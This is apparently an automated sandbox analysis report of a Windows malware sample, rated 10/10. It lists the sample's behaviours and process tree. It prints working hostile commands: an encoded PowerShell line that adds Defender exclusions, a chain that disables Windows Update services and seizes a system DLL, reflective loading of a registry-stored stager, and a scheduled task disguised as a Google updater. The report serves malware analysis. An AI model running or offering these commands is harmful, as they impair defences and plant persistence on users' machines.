a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505

Analysis

max time kernel
301s
max time network
42s
platform
windows7_x64
resource
win7-20220414-en
submitted
06-05-2022 00:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe
Size

2.2MB
MD5

258534f009540a1b82120c82cd9e697e
SHA1

3243d37c9b3424f261663c7d8b4f8781c3925c8e
SHA256

a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505
SHA512

d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

services.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" services.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1520 created 420 1520 powershell.EXE winlogon.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

688 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

524 takeown.exe
1708 icacls.exe
1836 takeown.exe
1816 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1976 cmd.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

524 takeown.exe
1708 icacls.exe
1836 takeown.exe
1816 icacls.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	services.exe

description	pid	process	target process
PID 1520 created 420	1520	powershell.EXE	winlogon.exe

pid	process
688	updater.exe

pid	process
524	takeown.exe
1708	icacls.exe
1836	takeown.exe
1816	icacls.exe

pid	process
1976	cmd.exe

pid	process
524	takeown.exe
1708	icacls.exe
1836	takeown.exe
1816	icacls.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

conhost.exepowershell.EXEconhost.exe

description	pid	process	target process
PID 1668 set thread context of 268	1668	conhost.exe	conhost.exe
PID 1520 set thread context of 1952	1520	powershell.EXE	dllhost.exe
PID 1504 set thread context of 1288	1504	conhost.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1648 schtasks.exe

pid	process
1648	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60306c1df160d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.EXEpowershell.EXEdllhost.execonhost.exe

pid	process
1128	powershell.exe
1668	conhost.exe
1520	powershell.EXE
1520	powershell.EXE
2020	powershell.EXE
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1504	conhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1220 Explorer.EXE

pid	process
1220	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowershell.EXEpowershell.EXEdllhost.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeShutdownPrivilege	556	powercfg.exe
Token: SeShutdownPrivilege	1540	powercfg.exe
Token: SeShutdownPrivilege	768	powercfg.exe
Token: SeShutdownPrivilege	568	powercfg.exe
Token: SeDebugPrivilege	1668	conhost.exe
Token: SeDebugPrivilege	1520	powershell.EXE
Token: SeDebugPrivilege	1520	powershell.EXE
Token: SeDebugPrivilege	2020	powershell.EXE
Token: SeDebugPrivilege	1952	dllhost.exe
Token: SeDebugPrivilege	1504	conhost.exe
Token: SeShutdownPrivilege	1400	powercfg.exe
Token: SeShutdownPrivilege	1392	powercfg.exe
Token: SeShutdownPrivilege	1604	powercfg.exe
Token: SeShutdownPrivilege	1756	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	880	svchost.exe
Token: SeIncreaseQuotaPrivilege	880	svchost.exe
Token: SeSecurityPrivilege	880	svchost.exe
Token: SeTakeOwnershipPrivilege	880	svchost.exe
Token: SeLoadDriverPrivilege	880	svchost.exe
Token: SeSystemtimePrivilege	880	svchost.exe
Token: SeBackupPrivilege	880	svchost.exe
Token: SeRestorePrivilege	880	svchost.exe
Token: SeShutdownPrivilege	880	svchost.exe
Token: SeSystemEnvironmentPrivilege	880	svchost.exe
Token: SeUndockPrivilege	880	svchost.exe
Token: SeManageVolumePrivilege	880	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	880	svchost.exe
Token: SeIncreaseQuotaPrivilege	880	svchost.exe
Token: SeSecurityPrivilege	880	svchost.exe
Token: SeTakeOwnershipPrivilege	880	svchost.exe
Token: SeLoadDriverPrivilege	880	svchost.exe
Token: SeSystemtimePrivilege	880	svchost.exe
Token: SeBackupPrivilege	880	svchost.exe
Token: SeRestorePrivilege	880	svchost.exe
Token: SeShutdownPrivilege	880	svchost.exe
Token: SeSystemEnvironmentPrivilege	880	svchost.exe
Token: SeUndockPrivilege	880	svchost.exe
Token: SeManageVolumePrivilege	880	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	880	svchost.exe
Token: SeIncreaseQuotaPrivilege	880	svchost.exe
Token: SeSecurityPrivilege	880	svchost.exe
Token: SeTakeOwnershipPrivilege	880	svchost.exe
Token: SeLoadDriverPrivilege	880	svchost.exe
Token: SeSystemtimePrivilege	880	svchost.exe
Token: SeBackupPrivilege	880	svchost.exe
Token: SeRestorePrivilege	880	svchost.exe
Token: SeShutdownPrivilege	880	svchost.exe
Token: SeSystemEnvironmentPrivilege	880	svchost.exe
Token: SeUndockPrivilege	880	svchost.exe
Token: SeManageVolumePrivilege	880	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	880	svchost.exe
Token: SeIncreaseQuotaPrivilege	880	svchost.exe
Token: SeSecurityPrivilege	880	svchost.exe
Token: SeTakeOwnershipPrivilege	880	svchost.exe
Token: SeLoadDriverPrivilege	880	svchost.exe
Token: SeSystemtimePrivilege	880	svchost.exe
Token: SeBackupPrivilege	880	svchost.exe
Token: SeRestorePrivilege	880	svchost.exe
Token: SeShutdownPrivilege	880	svchost.exe
Token: SeSystemEnvironmentPrivilege	880	svchost.exe
Token: SeUndockPrivilege	880	svchost.exe
Token: SeManageVolumePrivilege	880	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	880	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.execonhost.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1416 wrote to memory of 1668	1416	a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe	conhost.exe
PID 1416 wrote to memory of 1668	1416	a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe	conhost.exe
PID 1416 wrote to memory of 1668	1416	a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe	conhost.exe
PID 1416 wrote to memory of 1668	1416	a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe	conhost.exe
PID 1668 wrote to memory of 1308	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1308	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1308	1668	conhost.exe	cmd.exe
PID 1308 wrote to memory of 1128	1308	cmd.exe	powershell.exe
PID 1308 wrote to memory of 1128	1308	cmd.exe	powershell.exe
PID 1308 wrote to memory of 1128	1308	cmd.exe	powershell.exe
PID 1668 wrote to memory of 1748	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1748	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1748	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1400	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1400	1668	conhost.exe	cmd.exe
PID 1668 wrote to memory of 1400	1668	conhost.exe	cmd.exe
PID 1748 wrote to memory of 1620	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1620	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1620	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1460	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1460	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1460	1748	cmd.exe	sc.exe
PID 1400 wrote to memory of 556	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 556	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 556	1400	cmd.exe	powercfg.exe
PID 1748 wrote to memory of 1568	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1568	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1568	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1996	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1996	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1996	1748	cmd.exe	sc.exe
PID 1400 wrote to memory of 1540	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 1540	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 1540	1400	cmd.exe	powercfg.exe
PID 1748 wrote to memory of 1368	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1368	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1368	1748	cmd.exe	sc.exe
PID 1400 wrote to memory of 768	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 768	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 768	1400	cmd.exe	powercfg.exe
PID 1748 wrote to memory of 1904	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1904	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1904	1748	cmd.exe	sc.exe
PID 1400 wrote to memory of 568	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 568	1400	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 568	1400	cmd.exe	powercfg.exe
PID 1748 wrote to memory of 1048	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1048	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1048	1748	cmd.exe	sc.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1748 wrote to memory of 1956	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1956	1748	cmd.exe	sc.exe
PID 1748 wrote to memory of 1956	1748	cmd.exe	sc.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe
PID 1668 wrote to memory of 268	1668	conhost.exe	conhost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Modifies security service
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:880

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
PID:1788

C:\Windows\system32\taskeng.exe
taskeng.exe {F1C68B00-8CE3-4077-9B06-8F1DC57B6CE0} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:372

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:668

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d32d404a-8b4f-436a-bcfc-926f5ca55564}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1192

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1220

C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe
"C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="
4⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:1620

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:1460

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:1568

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:1996

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:1368

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:1904

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:1048

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:1956

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:896

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:1260

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:240

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:1004

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:1608

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:1952

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:2044

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:524

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1708

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:1944

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:1532

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:532

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:1976

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:1540

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:864

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:1444

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:1760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:1652

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:1384

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:2000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
PID:1352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
- Loads dropped DLL
PID:1976

C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:688

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="
7⤵
PID:1448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="
8⤵
PID:1536

